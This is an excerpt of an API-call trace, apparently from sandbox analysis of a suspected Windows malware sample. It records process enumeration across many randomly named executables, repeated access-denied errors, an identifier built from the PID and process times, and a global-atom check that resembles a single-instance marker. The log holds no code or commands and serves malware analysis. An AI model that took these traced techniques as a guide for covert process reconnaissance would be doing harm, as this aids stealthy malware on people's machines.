	[0122.538] CloseHandle (hObject=0x698) returned 1
	[0122.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399cea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0122.538] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.538] CloseHandle (hObject=0x698) returned 1
	[0122.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5a00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.539] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.539] CloseHandle (hObject=0x698) returned 1
	[0122.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.539] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.539] CloseHandle (hObject=0x698) returned 1
	[0122.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5a00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.540] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.540] CloseHandle (hObject=0x698) returned 1
	[0122.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.540] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.540] CloseHandle (hObject=0x698) returned 1
	[0122.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399cea8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0122.540] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.540] CloseHandle (hObject=0x698) returned 1
	[0122.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.541] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.541] CloseHandle (hObject=0x698) returned 1
	[0122.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d6b8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.541] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.541] CloseHandle (hObject=0x698) returned 1
	[0122.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399cea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0122.541] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.541] CloseHandle (hObject=0x698) returned 1
	[0122.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b96e0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0122.542] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.542] CloseHandle (hObject=0x698) returned 1
	[0122.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.542] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.542] CloseHandle (hObject=0x698) returned 1
	[0122.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.543] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.543] CloseHandle (hObject=0x698) returned 1
	[0122.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.543] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.543] CloseHandle (hObject=0x698) returned 1
	[0122.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399cea8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0122.543] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.543] CloseHandle (hObject=0x698) returned 1
	[0122.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.544] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.544] CloseHandle (hObject=0x698) returned 1
	[0122.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.544] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.544] CloseHandle (hObject=0x698) returned 1
	[0122.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.545] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.545] CloseHandle (hObject=0x698) returned 1
	[0122.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b97a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0122.545] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.545] CloseHandle (hObject=0x698) returned 1
	[0122.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.545] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.545] CloseHandle (hObject=0x698) returned 1
	[0122.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0122.546] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.546] CloseHandle (hObject=0x698) returned 1
	[0122.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399cea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0122.546] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.546] CloseHandle (hObject=0x698) returned 1
	[0122.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5a00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.546] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.547] CloseHandle (hObject=0x698) returned 1
	[0122.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399cea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0122.547] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.547] CloseHandle (hObject=0x698) returned 1
	[0122.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0122.547] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.547] CloseHandle (hObject=0x698) returned 1
	[0122.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0122.548] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.548] CloseHandle (hObject=0x698) returned 1
	[0122.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.548] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetLastError () returned 0x5
	[0122.549] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.549] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0122.549] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.550] GetLastError () returned 0x5
	[0122.554] GetLastError () returned 0x5
	[0122.554] GetLastError () returned 0x5
	[0122.554] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.555] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetLastError () returned 0x5
	[0122.556] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.556] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0122.557] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.557] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0122.557] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0122.557] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0122.557] CloseHandle (hObject=0x698) returned 1
	[0122.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0122.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.557] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.557] CloseHandle (hObject=0x698) returned 1
	[0122.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.558] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.558] CloseHandle (hObject=0x698) returned 1
	[0122.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5b08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0122.558] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.558] CloseHandle (hObject=0x698) returned 1
	[0122.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.559] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.559] CloseHandle (hObject=0x698) returned 1
	[0122.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0122.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16dc8) returned 0xc0000004
	[0122.624] VirtualAlloc (lpAddress=0x0, dwSize=0x16ec8, flAllocationType=0x3000, flProtect=0x4) returned 0x3c20000
	[0122.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c20000, Length=0x16ec8, ResultLength=0x0 | out: SystemInformation=0x3c20000, ResultLength=0x0) returned 0x0
	[0122.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0122.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5b80, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0122.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5ad8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d628, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
